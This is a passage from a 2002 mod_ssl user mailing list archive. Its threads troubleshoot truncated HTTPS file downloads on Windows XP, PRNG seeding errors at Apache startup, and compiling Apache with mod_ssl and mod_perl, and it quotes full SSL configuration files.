#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"




Any and all help is greatly appreciated.

--Edward Wong


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 03:12:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA27428; Wed, 21 Aug 2002 03:11:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id DAA27424; Wed, 21 Aug 2002 03:10:41 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g7L177VL005848;
	Tue, 20 Aug 2002 21:07:08 -0400
Date: Tue, 20 Aug 2002 21:07:07 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Edward Wong 
cc: modssl-users@modssl.org
Subject: Re: Corrupt Jar and Cab files
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 20 Aug 2002, Edward Wong wrote:

> I'm seeing strange behavior when running apache 2.0.39 on Windows XP, where

First of all, it is critical that you upgrade to 2.0.40, as you are
currently wide open to attack with the Win32-related vulnerabilities in
2.0.39.

> jar and cab files are truncated after after only 16K or so (my jar/cab files
> are actually around 100K).  This seems to happen with just about any
> browser, regardless of the JVM.  Also, this issue only occurs on Windows XP.
>   Win2k, WinNT, and Linux all work properly.

I'm guessing you have not looked at the following:
http://www.apache.org/dist/httpd/binaries/win32/#xpbug

This is a bug in XP for which a hotfix exists.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 03:54:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA28763; Wed, 21 Aug 2002 03:53:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tera.umi.com id DAA28758; Wed, 21 Aug 2002 03:52:31 +0200 (MET DST)
Received: from aamail02.umi.bhowell.com (aamail02.umi.bhowell.com [165.215.60.27])
	by tera.umi.com (8.11.6/8.11.6) with ESMTP id g7L1lXM09057
	for ; Tue, 20 Aug 2002 21:47:33 -0400
Received: from aamailgfi.umi.bhowell.com ([172.24.3.36]) by aamail02.umi.bhowell.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13)
	id RDPBBCGM; Tue, 20 Aug 2002 21:45:52 -0400
Content-Class: urn:content-classes:message
Received: from mail pickup service by aamailgfi.umi.bhowell.com with Microsoft SMTPSVC; Tue, 20 Aug 2002 21:52:13 -0400
Received: from tera.umi.com ([192.195.245.144]) by aamailgfi.umi.bhowell.com with Microsoft SMTPSVC(5.0.2195.5329); Tue, 20 Aug 2002 17:30:40 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252]) by tera.umi.com (8.11.6/8.11.6) with ESMTP id g7KLPZM20178 for ; Tue, 20 Aug 2002 17:25:35 -0400
Received: by mmx.engelschall.com (Postfix) id 3ACEC19539; Tue, 20 Aug 2002 23:30:21 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id E52FC19530 for ; Tue, 20 Aug 2002 23:30:20 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA21834; Tue, 20 Aug 2002 23:29:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for  from smtpzilla3.xs4all.nl id XAA21810; Tue, 20 Aug 2002 23:28:21 +0200 (MET DST)
Received: from a194-109-241-89.adsl.xs4all.nl (a194-109-241-89.adsl.xs4all.nl [194.109.241.89]) by smtpzilla3.xs4all.nl (8.12.0/8.12.0) with SMTP id g7KLSFxG034879 for ; Tue, 20 Aug 2002 23:28:21 +0200 (CEST)
Date: Tue, 20 Aug 2002 23:31:47 +0200
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
From: "Jeroen Vriesman" 
To: 
Subject: Re: Problem starting Apache (yes I have read the FAQs!)
Message-ID: <20020820233147.7b832b3b.jeroen@experian.nl>
In-Reply-To: <3D629D0A.7080905@itaction.co.uk>
References: <1342AFEFF7609A42AD20DB9E0BF20DBF01668B@crwnmail1.staff.staffs.ac.uk><3D629D0A.7080905@itaction.co.uk>
Organization: Dynaserv
X-Mailer: Sylpheed version 0.7.8claws (GTK+ 1.2.10; )
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
X-OriginalArrivalTime: 20 Aug 2002 21:30:40.0984 (UTC) FILETIME=[D53D2580:01C24890]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeroen Vriesman" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 20 Aug 2002 20:48:26 +0100
"Peter Viertel"  wrote:

> there's more info on this in the reference manual, than the FAQ.
> 
> http://www.modssl.org/docs/2.8/ssl_reference.html#ToC4
> 
> Basically try changing the 'startup' one to use a 
> file:/path/to/file/with/junk/in/it that points at a file with something 
> random enough in it - I'm not mr crypto, but, by random I take it that > something an outside party cant guess ought to be enough, and you need 
Actally something like "having an autocorrelation function which looks like a dirac delta function" is better.
Since an algorithm can never produce real random, there are actually "hardware random generators" using a source like zener noise for random.

Regards.
mr. (paranoid) crypto.



> to experiment with file lengths a bit to find what works enough - some 
> people advocate using the syslog output. Of course if you're just 
> hacking around and you dont care that the NSA or the Home Office might 
> be able to decrypt your ssl streams, then why stress out about it?
> 

I do care, they are always after me, realy!


> the 'connect' one however should get by using the builtin or see if you 
> can get egd working - this one does affect performance, so avoid using 
> the exec: option because spawning processes is not cheap on resources.
> 
> rmr1@staffs.ac.uk wrote:
> 
> >Hi all -
> >
> >This seems to be a commonly reported problem, but for all the archives
> >and FAQs I've read, I am no further forward. Here is the situation: 
> >
> >Apache 1.3.26, openSSL 0.9.6g, mod_ssl 2.8.10-1.3.26, Compaq Tru64 UNIX
> >4.0F.
> >
> >On starting Apache, it immediately exits and logs the following in the
> >error log file:
> >
> >[Tue Aug 20 15:50:13 2002] [error] mod_ssl: Init: Failed to generate
> >temporary 512 bit RSA private key (OpenSSL library error follows)
> >[Tue Aug 20 15:50:13 2002] [error] OpenSSL: error:24064064:random number
> >generator:SSLEAY_RAND_BYTES:PRNG not seeded
> >[Tue Aug 20 15:50:13 2002] [error] OpenSSL: error:04069003:rsa
> >routines:RSA_generate_key:BN lib
> >
> >The FAQ refers to the SSLRandomSeed directive; this is set in the
> >httpd.conf file as
> >
> >SSLRandomSeed startup builtin
> >SSLRandomSeed connect builtin
> >
> >(As I'm running on Tru64 I don't have the option of using /dev/random)
> >
> >It also refers to problems at the "make certificate" stage; that seems
> >to have gone through without any problems.
> >
> >I've also read that there are problems with PHP, so I have removed all
> >reference in the httpd.conf file to the dynamic PHP module, and for good
> >measure the dynamic Apache Jserv module, so these are not loading. Still
> >no diference.
> >
> >Can anyone offer me some more pointers?
> >
> >Thanks
> >
> >Richard
> >
> >--
> >
> >Richard Rogers
> >IT Services, Staffordshire University
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >  
> >
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 07:37:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA03162; Wed, 21 Aug 2002 07:36:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA03158; Wed, 21 Aug 2002 07:36:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9E2F84CE715; Wed, 21 Aug 2002 07:36:05 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BDE8C28672; Wed, 21 Aug 2002 07:35:38 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.microanswers.net id XAA21786; Tue, 20 Aug 2002 23:20:08 +0200 (MET DST)
Received: from there (ns2.microanswers.net [63.230.56.75])
	by ns1.microanswers.net (8.12.5/8.12.5) with SMTP id g7KLGv4h003578
	for ; Tue, 20 Aug 2002 16:16:57 -0500
Message-Id: <200208202116.g7KLGv4h003578@ns1.microanswers.net>
Content-Type: text/plain;
  charset="iso-8859-15"
From: Andrew Lietzow 
Organization: The ACL Group, Inc. 
To: modssl-users@modssl.org
Subject: Re: Compile of Apache
Date: Tue, 20 Aug 2002 16:21:07 -0500
X-Mailer: KMail [version 1.3.1]
References: <3D514619.6060007@cnpsa.embrapa.br>
In-Reply-To: <3D514619.6060007@cnpsa.embrapa.br>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew Lietzow 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wednesday 07 August 2002 11:08 am, you wrote:
> Firstly, excuse my weak English.
> I am trying to compile the Apache-1.3.26, with SSL (openssl-0.9.6d or
> mod_ssl-2.8.10-1.3.26) and mod_perl (mod_perl-1.26). I tried to compile
> in several different ways, for the Apache, using the openssl and for the
> mod_perl (INSTALL.simple.mod_ssl).
> Both seem to compile well and to generate the binary ones. SSL works
> well. However, in any situation I am getting to execute scripts PERL.
> Could anybody send me a compilation and installation script of the
> Apache with SSL and MOD_PERL that it works appropriately?
> I am using RedHat 6.2 in a Sun UltraSparc 10 with perl 5.003.
> Thank you.

Perhaps it's the "I love to be on the bleeding edge" drive in me which has 
regrettably proven to be something other than a brilliant move so many times, 
but I question why would you not install Apache 2.0.40 and skip the 1.3.26 
all together?  

It seems to work so much better right out of the tarball, having mod_so, 
pre-compiled into the code, making the addition of mod_perl and mod_ssl 
seemingly much easier.  

I do know that the install of 2.0.X has been quite smooth, relative to 
1.3.26.    

Am I off track in that assumption?   Am I leading this fellow astray?   
Perhaps there are quirks that won't allow an install to RHL 6.2 and Sun US 10?

-- 
Andrew Lietzow        
The ACL Group, Inc.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 07:44:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA03389; Wed, 21 Aug 2002 07:43:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id HAA03381; Wed, 21 Aug 2002 07:42:41 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 20 Aug 2002 22:42:35 -0700
Received: from 24.116.39.8 by lw11fd.law11.hotmail.msn.com with HTTP;
	Wed, 21 Aug 2002 05:42:35 GMT
X-Originating-IP: [24.116.39.8]
From: "Edward Wong" 
To: modssl-users@modssl.org
Subject: Re: Corrupt Jar and Cab files
Date: Tue, 20 Aug 2002 22:42:35 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 21 Aug 2002 05:42:35.0404 (UTC) FILETIME=[8D343CC0:01C248D5]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edward Wong" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

One more thing:  this issue actually applies to all files of any type.  
Anything bigger than about 30K gets truncated.

--Ed


>From: "Edward Wong" 
>Reply-To: modssl-users@modssl.org
>To: modssl-users@modssl.org
>Subject: Corrupt Jar and Cab files
>Date: Tue, 20 Aug 2002 16:49:56 -0700
>MIME-Version: 1.0
>X-Originating-IP: [156.153.254.10]
>Received: from [195.27.130.252] by hotmail.com (3.2) with ESMTP id 
>MHotMailBF2C214600B44004310CC31B82FC073D0; Tue, 20 Aug 2002 16:52:48 -0700
>Received: by mmx.engelschall.com (Postfix)id 6744E19493; Wed, 21 Aug 2002 
>01:52:12 +0200 (CEST)
>Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch 
>[129.132.7.153])by mmx.engelschall.com (Postfix) with ESMTP id 
>1F9B719389for ; Wed, 21 Aug 2002 
>01:52:12 +0200 (CEST)
>Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-Lid 
>BAA25227; Wed, 21 Aug 2002 01:51:15 +0200 (MET DST)
>Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
>from hotmail.com id BAA25223; Wed, 21 Aug 2002 
>01:51:02 +0200 (MET DST)
>Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; 
>Tue, 20 Aug 2002 16:49:57 -0700
>Received: from 156.153.254.10 by lw11fd.law11.hotmail.msn.com with 
>HTTP;Tue, 20 Aug 2002 23:49:56 GMT
>From owner-mmx-modssl-users@mmx.engelschall.com Tue, 20 Aug 2002 16:53:34 
>-0700
>Message-ID: 
>X-OriginalArrivalTime: 20 Aug 2002 23:49:57.0039 (UTC) 
>FILETIME=[49D5F3F0:01C248A4]
>Sender: owner-modssl-users@modssl.org
>Precedence: bulk
>X-Sender: "Edward Wong" 
>X-List-Manager: Majordomo [version 1.94.4]
>X-List-Name: modssl-users
>
>Hello All,
>
>I'm seeing strange behavior when running apache 2.0.39 on Windows XP, where 
>jar and cab files are truncated after after only 16K or so (my jar/cab 
>files are actually around 100K).  This seems to happen with just about any 
>browser, regardless of the JVM.  Also, this issue only occurs on Windows 
>XP.  Win2k, WinNT, and Linux all work properly.
>
>In Windows XP under http, everything seems to work just fine.  Under https, 
>everything works fine EXCEPT for the jar and cab files.  Taking a look at 
>the java cache shows that natually, the jar and cab files are missing.  My 
>ssl conf files are as follows:
>
>-------------------ssl.conf------------------------
>
>#
># This is the Apache server configuration file providing SSL support.
># It contains the configuration directives to instruct the server how to
># serve pages over an https connection. For detailing information about 
>these
># directives see 
>#
>#   For the moment, see  for this info.
>#   The documents are still being prepared from material donated by the
>#   modssl project.
>#
>
>#
># When we also provide SSL we have to listen to the
># standard HTTP port (see above) and to the HTTPS port
>#
>
>include conf/ssllisten.conf
>
>##
>##  SSL Global Context
>##
>##  All SSL configuration in this context applies both to
>##  the main server and all SSL-enabled virtual hosts.
>##
>
>#
>#   Some MIME-types for downloading Certificates and CRLs
>#
>AddType application/x-x509-ca-cert .crt
>AddType application/x-pkcs7-crl    .crl
>AddType application/x-509-ca-cert  .csr
>
>#   Pass Phrase Dialog:
>#   Configure the pass phrase gathering process.
>#   The filtering dialog program (`builtin' is a internal
>#   terminal dialog) has to provide the pass phrase on stdout.
>#SSLPassPhraseDialog  exec:certificates/getPassword.exe
>
>#   Inter-Process Session Cache:
>#   Configure the SSL Session Cache: First the mechanism
>#   to use and second the expiring timeout (in seconds).
>#SSLSessionCache        none
>#SSLSessionCache        shmht:logs/ssl_scache(512000)
>#SSLSessionCache        shmcb:logs/ssl_scache(512000)
>SSLSessionCache         dbm:logs/ssl_scache
>SSLSessionCacheTimeout  300
>
>#   Semaphore:
>#   Configure the path to the mutual exclusion semaphore the
>#   SSL engine uses internally for inter-process synchronization.
>SSLMutex  file:logs/ssl_mutex
>
>#   Pseudo Random Number Generator (PRNG):
>#   Configure one or more sources to seed the PRNG of the
>#   SSL library. The seed data should be of good random quality.
>#   WARNING! On some platforms /dev/random blocks if not enough entropy
>#   is available. This means you then cannot use the /dev/random device
>#   because it would lead to very long connection times (as long as
>#   it requires to make more entropy available). But usually those
>#   platforms additionally provide a /dev/urandom device which doesn't
>#   block. So, if available, use this one instead. Read the mod_ssl User
>#   Manual for more details.
>SSLRandomSeed startup builtin
>SSLRandomSeed connect builtin
>#SSLRandomSeed startup file:/dev/random  512
>#SSLRandomSeed startup file:/dev/urandom 512
>#SSLRandomSeed connect file:/dev/random  512
>#SSLRandomSeed connect file:/dev/urandom 512
>
>#   Logging:
>#   The home of the dedicated SSL protocol logfile. Errors are
>#   additionally duplicated in the general error log file.  Put
>#   this somewhere where it cannot be used for symlink attacks on
>#   a real server (i.e. somewhere where only root can write).
>#   Log levels are (ascending order: higher ones include lower ones):
>#   none, error, warn, info, trace, debug.
>#SSLLog      logs/ssl_engine_log
>#SSLLogLevel warn
>
>
>#   SSL Cipher Suite:
>include conf/ciphers.conf
>
>##
>## SSL Virtual Host Context
>##
>
>include conf/sslvirtualhost.conf
>
>
>
>
>--------and sslvirtualhost.conf--------
>
>
>
>
>#DocumentRoot "doc"
>#ServerAdmin you@your.address
>ErrorLog logs/error_log
>TransferLog logs/access_log
>UseCanonicalName On
>
>#   SSL Engine Switch:
>#   Enable/Disable SSL for this virtual host.
>SSLEngine on
>
>#   Server Certificate:
>#   Point SSLCertificateFile at a PEM encoded certificate.  If
>#   the certificate is encrypted, then you will be prompted for a
>#   pass phrase.  Note that a kill -HUP will prompt again. A test
>#   certificate can be generated with `make certificate' under
>#   built time. Keep in mind that if you've both a RSA and a DSA
>#   certificate you can configure both in parallel (to also allow
>#   the use of DSA ciphers, etc.)
>
>SSLCertificateFile certificates/server.crt
>
>
>#   Server Private Key:
>#   If the key is not combined with the certificate, use this
>#   directive to point at the key file.  Keep in mind that if
>#   you've both a RSA and a DSA private key you can configure
>#   both in parallel (to also allow the use of DSA ciphers, etc.)
>
>SSLCertificateKeyFile certificates/server.key
>
>
>#   Server Certificate Chain:
>#   Point SSLCertificateChainFile at a file containing the
>#   concatenation of PEM encoded CA certificates which form the
>#   certificate chain for the server certificate. Alternatively
>#   the referenced file can be the same as SSLCertificateFile
>#   when the CA certificates are directly appended to the server
>#   certificate for convinience.
>
>#SSLCertificateChainFile certificates/server.crt
>
>
>#   Certificate Authority (CA):
>#   Set the CA certificate verification path where to find CA
>#   certificates for client authentication or alternatively one
>#   huge file containing all of them (file must be PEM encoded)
>#   Note: Inside SSLCACertificatePath you need hash symlinks
>#         to point to the certificate files. Use the provided
>#         Makefile to update the hash symlinks after changes.
>#SSLCACertificatePath /Apache2/conf/ssl.crt
>#SSLCACertificateFile /Apache2/conf/ssl.crt/ca-bundle.crt
>
>#   Certificate Revocation Lists (CRL):
>#   Set the CA revocation path where to find CA CRLs for client
>#   authentication or alternatively one huge file containing all
>#   of them (file must be PEM encoded)
>#   Note: Inside SSLCARevocationPath you need hash symlinks
>#         to point to the certificate files. Use the provided
>#         Makefile to update the hash symlinks after changes.
>#SSLCARevocationPath /Apache2/conf/ssl.crl
>#SSLCARevocationFile /Apache2/conf/ssl.crl/ca-bundle.crl
>
>#   Client Authentication (Type):
>#   Client certificate verification type and depth.  Types are
>#   none, optional, require and optional_no_ca.  Depth is a
>#   number which specifies how deeply to verify the certificate
>#   issuer chain before deciding the certificate is not valid.
>#SSLVerifyClient require
>#SSLVerifyDepth  10
>
>#   Access Control:
>#   With SSLRequire you can do per-directory access control based
>#   on arbitrary complex boolean expressions containing server
>#   variable checks and other lookup directives.  The syntax is a
>#   mixture between C and Perl.  See the mod_ssl documentation
>#   for more details.
>#
>#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
>#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
>#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
>#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
>#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
>#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
>#
>
>#   SSL Engine Options:
>#   Set various options for the SSL engine.
>#   o FakeBasicAuth:
>#     Translate the client X.509 into a Basic Authorisation.  This means 
>that
>#     the standard Auth/DBMAuth methods can be used for access control.  
>The
>#     user name is the `one line' version of the client's X.509 
>certificate.
>#     Note that no password is obtained from the user. Every entry in the 
>user
>#     file needs this password: `xxj31ZMTZzkVA'.
>#   o ExportCertData:
>#     This exports two additional environment variables: SSL_CLIENT_CERT 
>and
>#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
>#     server (always existing) and the client (only existing when client
>#     authentication is used). This can be used to import the certificates
>#     into CGI scripts.
>#   o StdEnvVars:
>#     This exports the standard SSL/TLS related `SSL_*' environment 
>variables.
>#     Per default this exportation is switched off for performance reasons,
>#     because the extraction step is an expensive operation and is usually
>#     useless for serving static content. So one usually enables the
>#     exportation for CGI and SSI requests only.
>#   o CompatEnvVars:
>#     This exports obsolete environment variables for backward 
>compatibility
>#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use 
>this
>#     to provide compatibility to existing CGI scripts.
>#   o StrictRequire:
>#     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
>#     under a "Satisfy any" situation, i.e. when it applies access is 
>denied
>#     and no other module can change it.
>#   o OptRenegotiate:
>#     This enables optimized SSL connection renegotiation handling when SSL
>#     directives are used in per-directory context.
>SSLOptions +StdEnvVars +StrictRequire +OptRenegotiate
>
>    SSLOptions +StdEnvVars
>
>
>
>#   SSL Protocol Adjustments:
>#   The safe and default but still SSL/TLS standard compliant shutdown
>#   approach is that mod_ssl sends the close notify alert but doesn't wait 
>for
>#   the close notify alert from client. When you need a different shutdown
>#   approach you can use one of the following variables:
>#   o ssl-unclean-shutdown:
>#     This forces an unclean shutdown when the connection is closed, i.e. 
>no
>#     SSL close notify alert is send or allowed to received.  This violates
>#     the SSL/TLS standard but is needed for some brain-dead browsers. Use
>#     this when you receive I/O errors because of the standard approach 
>where
>#     mod_ssl sends the close notify alert.
>#   o ssl-accurate-shutdown:
>#     This forces an accurate shutdown when the connection is closed, i.e. 
>a
>#     SSL close notify alert is send and mod_ssl waits for the close notify
>#     alert of the client. This is 100% SSL/TLS standard compliant, but in
>#     practice often causes hanging connections with brain-dead browsers. 
>Use
>#     this only for browsers where you know that their SSL implementation
>#     works correctly.
>#   Notice: Most problems of broken clients are also related to the HTTP
>#   keep-alive facility, so you usually additionally want to disable
>#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
>#   Similarly, one has to force some clients to use HTTP/1.0 to workaround
>#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
>#   "force-response-1.0" for this.
>SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
>
>#   Per-Server Logging:
>#   The home of a custom SSL log file. Use this when you want a
>#   compact non-error SSL logfile on a virtual host basis.
>CustomLog logs/ssl_request_log \
>          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
>
>
>
>Any and all help is greatly appreciated.
>
>--Edward Wong
>
>
>_________________________________________________________________
>Send and receive Hotmail on your mobile device: http://mobile.msn.com
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org




_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 07:45:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA03398; Wed, 21 Aug 2002 07:44:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id HAA03394; Wed, 21 Aug 2002 07:43:44 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 20 Aug 2002 22:43:38 -0700
Received: from 24.116.39.8 by lw11fd.law11.hotmail.msn.com with HTTP;
	Wed, 21 Aug 2002 05:43:38 GMT
X-Originating-IP: [24.116.39.8]
From: "Edward Wong" 
To: modssl-users@modssl.org
Subject: Re: Corrupt Jar and Cab files
Date: Tue, 20 Aug 2002 22:43:38 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 21 Aug 2002 05:43:38.0506 (UTC) FILETIME=[B2D0D6A0:01C248D5]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edward Wong" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Cliff.  It looks like that's the answer!

--Ed


>From: Cliff Woolley 
>Reply-To: modssl-users@modssl.org
>To: Edward Wong 
>CC: modssl-users@modssl.org
>Subject: Re: Corrupt Jar and Cab files
>Date: Tue, 20 Aug 2002 21:07:07 -0400 (EDT)
>MIME-Version: 1.0
>Received: from mc2-f23.law16.hotmail.com ([65.54.237.30]) by 
>mc2-s11.law16.hotmail.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 20 
>Aug 2002 18:28:20 -0700
>Received: from mmx.engelschall.com ([195.27.130.252]) by 
>mc2-f23.law16.hotmail.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 20 
>Aug 2002 18:12:51 -0700
>Received: by mmx.engelschall.com (Postfix)id 631D3195A4; Wed, 21 Aug 2002 
>03:12:12 +0200 (CEST)
>Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch 
>[129.132.7.153])by mmx.engelschall.com (Postfix) with ESMTP id 
>2DF11194DEfor ; Wed, 21 Aug 2002 
>03:12:12 +0200 (CEST)
>Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-Lid 
>DAA27428; Wed, 21 Aug 2002 03:11:09 +0200 (MET DST)
>Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
>from deepthought.cs.virginia.edu id DAA27424; Wed, 
>21 Aug 2002 03:10:41 +0200 (MET DST)
>Received: from localhost (root@localhost)by deepthought.cs.virginia.edu 
>(8.12.4/8.11.4) with ESMTP id g7L177VL005848;Tue, 20 Aug 2002 21:07:08 
>-0400
>X-X-Sender: root@deepthought.cs.virginia.edu
>In-Reply-To: 
>Message-ID: 
>
>Sender: owner-modssl-users@modssl.org
>Precedence: bulk
>X-Sender: Cliff Woolley 
>X-List-Manager: Majordomo [version 1.94.4]
>X-List-Name: modssl-users
>Return-Path: owner-mmx-modssl-users@mmx.engelschall.com
>X-OriginalArrivalTime: 21 Aug 2002 01:12:54.0126 (UTC) 
>FILETIME=[E06928E0:01C248AF]
>
>On Tue, 20 Aug 2002, Edward Wong wrote:
>
> > I'm seeing strange behavior when running apache 2.0.39 on Windows XP, 
>where
>
>First of all, it is critical that you upgrade to 2.0.40, as you are
>currently wide open to attack with the Win32-related vulnerabilities in
>2.0.39.
>
> > jar and cab files are truncated after after only 16K or so (my jar/cab 
>files
> > are actually around 100K).  This seems to happen with just about any
> > browser, regardless of the JVM.  Also, this issue only occurs on Windows 
>XP.
> >   Win2k, WinNT, and Linux all work properly.
>
>I'm guessing you have not looked at the following:
>http://www.apache.org/dist/httpd/binaries/win32/#xpbug
>
>This is a bug in XP for which a hotfix exists.
>
>--Cliff
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org




_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 11:06:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA07836; Wed, 21 Aug 2002 11:05:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from scanmail1.cableone.net id LAA07510; Wed, 21 Aug 2002 11:04:18 +0200 (MET DST)
Received: from scanmail1.cableone.net ([10.116.0.121]) by scanmail1.cableone.net  with Microsoft SMTPSVC(5.5.1877.687.68);
